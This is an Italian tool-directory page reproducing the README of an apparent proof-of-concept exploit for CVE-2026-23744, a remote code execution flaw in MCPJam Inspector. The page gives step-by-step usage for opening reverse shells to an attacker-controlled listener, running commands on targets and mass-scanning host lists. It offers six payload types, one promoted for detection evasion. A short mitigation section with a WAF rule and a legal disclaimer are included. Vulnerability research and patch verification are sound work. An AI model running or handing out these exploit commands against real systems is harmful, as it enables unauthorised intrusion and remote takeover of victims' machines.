Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo Payload
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

Vedi Repository
7141 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Un exploit proof-of-concept per la vulnerabilità CVE-2026-23744 - MCPJam Inspector di Esecuzione di codice remoto (RCE). Questo strumento dimostra la falla di sicurezza nelle versioni <=1.4.2 e aiuta i ricercatori di sicurezza a verificare le patch. Esclusivamente per test autorizzati e scopi educativi. Include molteplici opzioni di payload, esecuzione di comandi e gestione delle sessioni.

Condividi

CVE-2026-23744 MCPJam Inspector RCE Exploit

Security Research Python 3.7+ Version Author


⚠️ AVVISO

Questo strumento è destinato ESCLUSIVAMENTE a test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato è illegale. Gli utenti si assumono ogni responsabilità per le loro azioni.


📋 Panoramica

Questo repository contiene un proof-of-concept per CVE-2026-23744, una vulnerabilità di Esecuzione Remota di Codice (RCE) non autenticata presente in MCPJam Inspector versioni <=1.4.2. La vulnerabilità ha un punteggio CVSS critico di 9.8, indicando un rischio grave con vettore d'attacco di rete.

AttributoDettagli
ID CVECVE-2026-23744
VulnerabilitàEsecuzione Remota di Codice non autenticata
Versioni Affette<=1.4.2
Punteggio CVSS9.8 (Critico)
Vettore d'AttaccoRete

📸 Screenshot

ex

🚀 Caratteristiche

Lo strumento di exploit offre un insieme completo di funzionalità progettate per test di sicurezza efficaci:

  • Supporto Multi-Payload: Include payload Bash, Python, Netcat, Perl, PHP e Base64.
  • Esecuzione di Comandi: Esegue comandi sul sistema target con cattura dell'output.
  • Scansione dei Target: Scansiona più target con limitazione di frequenza configurabile.
  • Gestione delle Sessioni: Gestione persistente delle sessioni per test in corso.
  • Supporto Proxy: Integrazione con proxy per traffico anonimo o instradato.
  • Fingerprinting del Target: Identifica le caratteristiche del sistema target.
  • Configurazione Automatica del Listener: Configura automaticamente i listener per reverse shell.

📦 Installazione

Per configurare lo strumento di exploit, segui questi passaggi:

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Installa le dipendenze:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Esempi di Utilizzo

Sfruttamento Base

Per avviare uno sfruttamento base, prima configura un listener, poi esegui lo script di exploit:

root@kitploit:~
# Avvia listener
nc -lvnp 4444

# Esegui exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Esecuzione di Comandi

Esegui comandi singoli o comandi da file:

root@kitploit:~
# Esegui comando singolo
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Esegui comandi da file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Payload Diversi

Utilizza vari tipi di payload per scenari differenti:

root@kitploit:~
# Reverse shell Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Reverse shell Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Payload codificato in Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Scansione dei Target

Scansiona più target per la vulnerabilità:

root@kitploit:~
# Crea file dei target
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Scansiona per target vulnerabili
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Opzioni Avanzate

Esplora funzionalità avanzate come fingerprinting, uso di proxy, modalità verbose e configurazione automatica del listener:

root@kitploit:~
# Con fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# Con proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Modalità verbose
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Listener automatico
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Tipi di Payload

TipoComandoMigliore per
bashReverse shell BashLa maggior parte dei sistemi Linux
pythonReverse shell Python3Sistemi con Python installato
ncReverse shell NetcatSistemi con netcat
perlReverse shell PerlSistemi con Perl installato
phpReverse shell PHPSistemi con PHP installato
base64Codifica Base64Elusione del rilevamento

📊 Output di Esempio

root@kitploit:~
[+] Avvio exploit migliorato contro http://192.168.1.100:8080
[+] Reverse shell verso 10.0.0.5:4444
[*] ID Sessione: AbCdEfGh
[*] Fingerprinting del target...
[+] SO Target: Ubuntu
[+] Capacità disponibili: python3, perl, nc
[*] Esecuzione exploit...
[+] Exploit riuscito!
[!] Controlla il tuo listener netcat su 10.0.0.5:4444

🛡️ Mitigazione

Azioni Immediate

Per proteggersi da CVE-2026-23744, è fondamentale eseguire le seguenti azioni immediate:

  • Aggiornare MCPJam Inspector alla versione >1.4.2.
  • Isolare i sistemi vulnerabili dalla rete.
  • Monitorare richieste POST sospette a /api/mcp/connect.
  • Implementare regole del Web Application Firewall (WAF) per bloccare pattern malevoli.

Esempio di Regola WAF

Esempio di regola Nginx WAF per bloccare pattern malevoli comuni:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ FAQ

D: È legale utilizzarlo?

R: Questo strumento è legale solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.

D: Quali sistemi sono vulnerabili?

R: Le versioni di MCPJam Inspector <=1.4.2 sono vulnerabili.

D: Come posso proteggere i miei sistemi?

R: Aggiorna immediatamente MCPJam Inspector alla versione >1.4.2.


📚 Riferimenti

  • CVE-2026-23744 MITRE

👤 Autore

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Changelog

Versione 2.0 (14 luglio 2026)

  • ✅ Risolta affidabilità del controllo listener
  • ✅ Implementata modalità di esecuzione comandi
  • ✅ Aggiunto fingerprinting del target
  • ✅ Migliorata gestione delle sessioni
  • ✅ Aggiunti fallback dei payload

Versione 1.0 (10 luglio 2026)

  • ✅ Prima release

⚠️ Avviso Finale

L'uso non autorizzato di questo strumento è illegale e può comportare conseguenze gravi, tra cui:

  • Procedimenti penali
  • Cause civili
  • Casellario giudiziario permanente
  • Sanzioni professionali

Fatto con ❤️ da Sudeepa Wanigarathna

Scarica lo strumento